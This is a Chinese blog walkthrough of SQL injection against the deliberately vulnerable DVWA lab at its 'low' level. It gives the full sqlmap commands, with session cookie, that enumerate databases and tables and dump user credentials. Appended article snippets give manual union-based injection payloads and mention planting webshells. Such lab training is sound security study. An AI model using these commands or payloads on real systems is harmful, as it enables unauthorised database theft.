【渗透测试】【Sqlmap】DVWA-SQL Injection(low)

最新推荐文章于 2025-07-08 00:14:24 发布
原创 最新推荐文章于 2025-07-08 00:14:24 发布 · 432 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍如何使用sqlmap工具进行SQL注入攻击,从设置Cookie到获取数据库信息,最终提取用户名及明文密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

①进入sqlmap目录,使用-u命令访问地址:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

发现跳转到302了,被重定向了,所以这样不行…

又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。

②使用--cookie命令加上相应的low级别的cookie,再跑一次。因为怕它一直询问,所以为了方便起见,加了--batch命令,让它可以自动回答询问:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch

跑成功了。

③接下来要跑一下数据库,使用--dbs命令:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch --dbs

可以看到有8个数据库。

④接下来我们可以用-D命令指定数据库,用--tables命令查看其中所有表

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa --tables

嗯,有两个表,显而易见,用户信息肯定在users表里面。

⑤用-T命令指定表,用--columns命令查看表的列:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa -T users --columns

胜利的曙光就在前方了。我们可以看到表中有字段user和password,也就是用户名和密码了。

⑥最后我们可以用-C命令指定需要的列,用--dump命令将其中的数据脱出来:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa -T users -C user,password --dump

OK,可以看到用户名和密码了,而且密码还被译成了明文。

 

DVWA--SQL注入(SQL Injection)--Low
JakeLin's Blog
06-15 492
SQL注入常规思路: 1、寻找注入点,可以通过 web 扫描工具实现 2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。 3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息) 4、可以通过获得的用户信息,寻找后台登录。 5、利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。 手工注入常规思路: 1.判断是否存在注入,注入是字符型还是...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3132
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA SQL Injection LOW
weixin_34008784的博客
11-26 216
最近在学习SQL注入,初出茅庐,就从dvwa开始吧 sql注入可以通过sqlmap工具实现,为了更好地了解原理,这里主要是手工注入 注入的一般流程为: 1,找到注入点,此步骤可通过工具 2,判断注入类型 3,判断列数,展示位 4,利用函数获取数据库用户,版本号,数据库名等信息 5,联合注入法利用information_schema数据库中存储所有的表...
sqlmapDVWA 进行自动化 SQL 注入测试
最新发布
weixin_43435891的博客
07-08 727
SQLMap是一款功能强大的开源SQL注入工具,能够自动检测利用SQL注入漏洞。它支持多种数据库(MySQL、Oracle等),可自动识别注入点(GET/POST/Cookie等),并能枚举数据库信息、提取数据甚至执行系统命令。常用命令包括基本检测、查看数据库/表/字段、数据导出等,支持代理/WAF绕过。但需注意:未经授权测试违法,可能造成服务崩溃,且遇到强WAF时需配合其他工具。建议仅用于授权测试或靶场练习。
DVWA-SQL Injection(low)
七月_的博客
10-21 437
文章目录安装dvwa下载、安装PhpStudy下载、存放DVWA配置DVWA环境创建数据库出错成功登录LowSQL Injection:(1)判断(2)用order by判断列数(3)注入出当前数据库所有的表名(4)注入出某一个表中的全部列名(5)注入出字段内容low SQL Injection源码 安装dvwa 下载、安装PhpStudy 下载地址传送门:https://www.xp.cn/do...
DVWA——SQL Injection(LOW)
qq_54448882的博客
11-05 3432
此文章仅供学习使用,请勿用作违法行为。 目录 注入的前提条件 基本思路 1.判断是否存在注入点,以及注入的类型(字符型/数字型) 2.猜解SQL查询语句中的字段数字段顺序 3.确定回显点 4.获取当前数据库 5.获取数据库中的表 6.获取表中字段名 7.获取字段中的数据(此时已可以成功获取数据库内容) 注入的前提条件: 参数用户可控:用户可以控制前端传入后端的参数内容 参数可带入数据库进行查询:用户传入的参数可以直接拼接到数据库的SQL语句,且带入数据库查询。 基本思路:
DVWA——SQL Injection(low)
分享简单的安全技术
01-06 316
SQL Injection 界面 源代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 527
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWA - SQL Injection (high)
qq_42630215的博客
05-28 431
low级别(手工注入 sqlmap工具注入) 手工注入 1.判断是否存在注入,注入的类型是字符型还是数字型 输入1 输入1’ 输入1’ and ‘1’='1 输入1’ and ‘1’='2 字符型注入 2.获取字段数 1’ order by 3# 1’ order by 2# 字段数为2 3.获取数据库名,版本 1’ union select version(),database()# 4.获取dvwa数据库中表名 1’ union select 1,group_concat(table_
DVWA-SQL Injectionsql注入)
MzHeader的博客
03-22 1659
DWVA-SQL Injectionsql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
sqlmapdvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 967
sqlmapdvwa中输入点进行带cookie注入测试
DVWA -SQL Injection (low)
qq_42630215的博客
05-26 317
low级别(手工注入 sqlmap工具注入) ** 手动注入 ** 1.判断是否存在注入,注入的类型是字符型还是数字型 输入1:(输入1-5都会返回正确的值) 输入 1’(发现报错,存在注入漏洞) Id是被’ ‘包括起来的,是属于字符型注入 闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值) 输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。 2.猜测sql查询语句中的字段数 1’ order by 3# 1’ order by 2# 3.确定显示的字段
DVWA】1.SQL Injection通关记录(Low
Zichel77的博客
10-21 410
Security Level:Low 1.判断注入点及注入类型 看到的是一个输入框,输入数字有对应返回值 所以这里应该是一个注入点,使用恒真恒假式来尝试一下 输入1' and '1'='2返回无结果,确定此处为注入点 再用恒真式来显示所有结果 输入1' or '1'='1('1'='1'恒真,中间使用or连接则整个查询式子恒真,即可返回所有查询结果) 2.判断数据库中的字段数 ...
SQL injection on DVWA (Low Level)
312小公举的专栏
05-12 1189
首先看看输入正常的ID得到什么结果: 当输入1‘ 时: 说明了这个id的类型是个string,数据库是MySQL 当输入1’ and '1'='1时,and后面的1=1是个永真式: 当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果: 确定数据表的列数: 输入' union select 1,2 --'
DVWA sql injection low
weixin_43345082的博客
06-12 295
Dvwa Low 1 1’ 1 and 1=1 1 and 1=2 select First name的列名 and Surname的列名from 表名 where id的列名 =‘我们输入的id’ 那么我们首先爆出它的库试试,用单引号让id闭合 内置查询函数version()  user()  database()  @@version_compile_os 输入 1’ union select...
DVWASQL Injection(含SQLMAP使用)
一期一会的博客
03-21 510
DVWASQL Injection 判断是否存在注入的方法:在输入框输入 1’ Select * from xxxx where id =1’ Select * from xxxx where id =’1’’ 无论是整型还是字符型此时都会报错,说明存在注入点 一.等级:LOW (一)分类 1.整型 测试如下: 此时界面结果显示一致,说明并非整型 select * from xxx where id=1 and 1=2 若为整型,说明sql语句不成立,会报错 2.字符型 在输入框输入“1’ an
使用SQLMAP学习DVWA-SQL InjectionSQL注入)
weixin_43838889的博客
04-28 673
SQLMAP 是知名的自动化SQL注入数据库工具,需要Python环境运行。 本文参考SQLMAP详解 向博主致谢 浏览器F12进入开发者调试界面,将Request Headers部分全部复制保存成dvwa_sqli_low.txt文件。 ##Low 执行sqlmap.py -r dvwa_sqli_low.txt, -r REQUESTFILE Load HTTP request from a file 从文件加载HTTP请求 D:
渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 1424
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
SQL Injection——low低级别
用博客做做记录的小白
06-06 222
DVWA靶场sql注入关卡低级难度
sqlmapdvwa低级sql注入
06-21
### 使用sqlmapDVWA低级SQL注入进行渗透测试 在使用sqlmapDVWA的低级SQL注入(Low Level SQL Injection)进行渗透测试时,需要确保正确配置目标URL相关的Cookies。以下是详细的说明与操作步骤: #### 1. 确定目标URL DVWASQL注入漏洞页面通常位于`/vulnerabilities/sqli/`路径下,目标URL格式如下: ```plaintext http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# ``` 其中,`<DVWA-IP>`为DVWA服务器的IP地址。 #### 2. 设置Cookies 为了绕过DVWA的安全级别限制(如`security=low`),需要提供正确的PHPSESSID安全级别参数。例如: ```plaintext PHPSESSID=v1d47lav6lot63v45vif84lren; security=low ``` #### 3. 基本命令结构 使用以下基本命令启动sqlmap工具: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" ``` 此命令中: - `-u`指定目标URL。 - `--cookie`传递必要的会话信息[^1]。 #### 4. 获取数据库信息 可以通过附加参数来获取更多数据库相关信息: - **获取当前数据库名称**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --current-db --batch ``` 此命令将返回当前使用的数据库名称,例如`dvwa`[^3]。 - **枚举所有数据库**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --dbs --batch ``` - **枚举特定数据库中的表**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa --tables --batch ``` - **枚举特定表中的列**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users --columns --batch ``` - **转储数据**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users -C user,password --dump --batch ``` #### 5. 注意事项 - **安全性**:仅在授权的环境中进行渗透测试,避免非法操作。 - **错误抑制**:DVWA可能通过代码修改抑制了MySQL错误信息输出[^4],这可能影响sqlmap的检测效率。在这种情况下,可以尝试布尔盲注或时间盲注模式。 - **布尔盲注**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --technique=B --batch ``` ### 示例代码 以下是一个完整的sqlmap命令示例: ```bash sqlmap -u "http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=v1d47lav6lot63v45vif84lren; security=low" -D dvwa -T users -C user,password --dump --batch ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值